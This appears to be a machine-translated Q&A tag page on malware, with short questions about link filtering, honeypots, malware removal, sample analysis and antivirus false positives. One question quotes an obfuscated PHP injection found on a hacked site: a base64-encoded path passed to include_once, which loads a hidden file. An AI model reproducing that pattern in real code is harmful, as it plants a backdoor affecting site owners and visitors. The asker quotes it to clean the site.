問題タブ [malware]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票する
1 に答える
186 参照

hyperlink - リンク短縮ウェブアプリのスパム/不正使用/マルウェアリンクを除外するために使用するのに最適なサービスは何ですか?

LincrとLinkBunchの2つのサービスがあります。LincrはプレーンなジェーンURL短縮サービスですが、LinkBunchを使用すると複数のリンクを1つのリンクに短縮できます。サービスに大量のスパムが投稿されたため、Lincrをシャットダウンする必要がありました。現在、LinkBunchでさえ同じ問題に直面しているようで、その理由で私のWebホストによって無効にされています。

悪いリンクが投稿されているため、このようなサイトをシャットダウンし続けることができないので、リンクが投稿されたときにリンクを除外するために使用できるマルウェアフィルタリングAPIが必要です。

たくさんの悪いリンクをダウンロードしてチェックできるサービスがありますが、代わりに、リンクごとにライブAPI呼び出しを実行することをお勧めします。そのために何を使用できますか?

最後に、そこにある最高のマルウェアフィルタリングサービスは何ですか?

0 投票する
1 に答える
632 参照

security - 攻撃に関するファイルと情報をハニーポットから HTTP 経由で中央リポジトリに送信する

こんにちは、ディオネアのハニーポットを知っている人はいますか?

ローカルで収集したバイナリ情報とハニーポットでローカルに収集した攻撃を中央のサーバーに送信しようとしているのですが、取得できません。

HTTP Post、Python CGI を使ってみましたが、取得できません。ハニーポットには、HTTP 経由でデータを送信できるサービス (submit_http.py: http://src.carnivore.it/dionaea/commit/?id=cfd2be8cf7484c781384648cf1c9223afc2bd3c1 ) があり、中央サーバーには元々開発された PHP ファイルがあります。 nepenthes の場合 (submit.php: http://www.remoteroot.net/2008/07/21/nepenthes-submit-http-server-with-file-upload/ )、ファイルとそれぞれに関する情報を受け取りたいHTTP POST を介して関連パラメータを攻撃します。submit.php が機能しないのはなぜですか?!

私は dionaea.conf を次のように持っています:

君たちありがとう。

0 投票する
1 に答える
2202 参照

windows - Windows CMD:ファイルを使用しているアプリケーションを特定する

これは実際にはプログラミングの問題ではありません...現在ファイルを使用しているアプリケーションを特定する方法はありますか?私はそれらのautorun.infウイルスの1つに感染しました。autorun.infを削除しようとすると、Windowsは、ファイルが別のアプリケーション(明らかにウイルス)によって使用されていることを通知します。

どのアプリケーションがファイルを使用しているかを知ることはできますか?無料のウイルス対策ソフトウェアを入手する方が簡単かもしれませんが、他のことを試す前に、まず自分でマルウェアを削除してみてください(役立つ知識になる可能性があります)。

0 投票する
2 に答える
15100 参照

analysis - 解凍したファイルを実行せずに Win32 キャビネット セルフ エクストラクターを解凍する方法

授業では、マルウェアを分析する必要があります。

これは、.EXE Win32 キャビネット自己解凍ファイルです。(これが Windows の見方です。実際には 4D 5A 00 03 Hex で始まります)。実行すると、作成されたフォルダー内のすべてのファイルが抽出され、マルウェア (バッチ/VBS ファイル) が実行され、最後にマルウェア ファイルを含むフォルダーが削除されます。

マルウェアを実行せずに抽出するにはどうすればよいのでしょうか? ProcDump32 を使用しましたが、「プロセスが 32 ビットでないか、ロードできないか、すでに終了しています!」というメッセージが表示されます。

どういうわけか、ProcDump32のスタックに成功し、フォルダーを数秒間取得して「消える」前にコピーしたので、ファイルを取得しましたが、すべてを収集したかどうかわからないので、適切な方法で行いたいと思います.

そこで、出力ファイルを実行せずに Win32 Cab Self-Extractor ファイルの内容を抽出し、可能であれば抽出されたファイルのリストを表示できるアプリケーションを探しています。

0 投票する
2 に答える
341 参照

installation - 私が作成したアプリケーション (そのセットアップ ファイル) がウイルス/トロイの木馬としてフラグ付けされた場合はどうすればよいですか?

クライアント用に (AutoHotKey 言語で) ダウンロード マネージャーを作成しましたが、少数のウイルス スキャナー (VirusTotal で使用されているスキャナーの 11%) によって、トロイの木馬、マルウェア、ドロッパー、データ スティーラーなどとしてフラグが付けられます。ソフトウェアは、これらのスキャナーによる誤ったフラグを修正したいものではありません。以前にこの種の問題に対処した人はいますか?

ここでの本当の複雑さは、これがダウンロード マネージャーであるため、私が配信している実際の署名付きバイナリが何千ものダウンロードごとに異なることです。そのため、すべての固有のバージョンをホワイト リストに登録するように要求することは現実的ではありません。

本当に隠したいことが何もないのに、実際のクローキング技術を使ってウイルス対策会社をだまそうとするのは避けたいと思いますが、他に選択肢があるかどうかはわかりません (また、そうするかどうかもわかりません)。成功)。何かアドバイス?

0 投票する
3 に答える
448 参照

java - Javaアプリがマルウェアであるかどうかの判断

WindowsまたはPCで実行されているJavaアプリがマルウェアであるかどうかを判断するためにどのような自動メソッドを使用できるのか知りたいです。(そのようなアプリでどのようなエクスプロイトが利用できるかさえ本当にわかりません。リスクについて知ることができる場所はありますか?)ソースコードがある場合、他のものよりも有害に使用される可能性のある特定のパッケージまたはクラスはありますか?おそらく彼らはマルウェアを示唆する可能性がありますか?

更新:返信ありがとうございます。私はこれが可能かどうか知りたいと思っていましたが、基本的にはまったく実行不可能に聞こえます。知っておくと良い。

0 投票する
1 に答える
179 参照

winapi - プロセスが所有していないウィンドウを制御することは、マルウェア アクティビティと見なされますか?

ウィンドウのサイズを制御し、非表示/表示し、自分のプロセスとは異なるプロセスが所有するウィンドウの前面に表示するために、ここで行われた提案の 1 つに従うことを計画しています。

MS Windows(XP)での別プロセスからのウィンドウハンドルによるウィンドウ操作

WinForms アプリから新しいプロセス ウィンドウのサイズと位置を制御するにはどうすればよいですか?

私のプロセスは、あなたが知っているマルウェア検出ソフトウェアによってマルウェアとして報告されますか?

他のプロセス ウィンドウを制御するには、自分のプロセスと他のプロセスが実行されている最高の特権よりも高い特権がプロセスに必要ですか?

0 投票する
1 に答える
1918 参照

linux - 共有ホスティングでの Linux Malware Detect

優れたhttp://www.rfxn.com/projects/linux-malware-detect/を共有ホスティングにインストールしようとしています。

inspath をローカル ディレクトリに変更しましたが、シンボリック リンクの作成でエラーが発生し、/usr/lib/ で読み取り専用になり、最後に /usr/local/maldetect/conf.maldet が見つかりません。

助けてくれてありがとう。これを解決すれば、多くの人にとって非常に役立つと思います。

エラーは次のとおりです。

インストール bash は次のとおりです。

0 投票する
3 に答える
1103 参照

php - ディレクトリおよびサブディレクトリ内の特定のコード任意のファイルを検索するコード

OK、私はphpにかなり慣れていませんが、ディレクトリとファイルを読み取ることができることを知っています。

サイトの 1 つでマルウェアの問題に取り組んでおり、ホスト スペースでマルウェアを検索するスクリプトを作成する必要があります。

ハッカーがファイルに入れているコードは

*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>

これが何であるかはわかりませんが、これが表示されると、Google が私のサイトをブロックします。

すべてのファイルをダウンロードしてから、dreamweaver で検索する必要があります。このがらくたをスペースに置き換えて元に戻します。

Googleが行う前にこれを検出するスクリプトが必要です。

誰かが私にいくつかの指針を与えることができれば、それは素晴らしいことです

これは、誰もが直面する問題であると確信しています。

0 投票する
3 に答える
3448 参照

web - 私のウェブサイトにはマルウェアが含まれています

警告:何かが正しくありません! www.mywebsite.com にはマルウェアが含まれています。このサイトにアクセスすると、コンピューターがウイルスに感染する可能性があります。続行すると、悪意のあるソフトウェアがコンピュータにインストールされる可能性があることが Google によって検出されました。過去にこのサイトにアクセスしたことがある場合、またはこのサイトを信頼している場合は、最近ハッカーによって侵害された可能性があります。先に進まないでください。おそらく明日もう一度試すか、別の場所に移動してください。www.mywebsite.com にサイトでマルウェアが見つかったことを既に通知しています。www.mywebsite.com で見つかった問題の詳細については、Google セーフ ブラウジングの診断ページにアクセスしてください。

このサイトにアクセスするとコンピュータに損害を与える可能性があることを理解している場合でも、続行してください。

私たちのウェブサイトの 1 つが現在ダウンしており、次のようになっています。これの原因は何ですか?助けてください。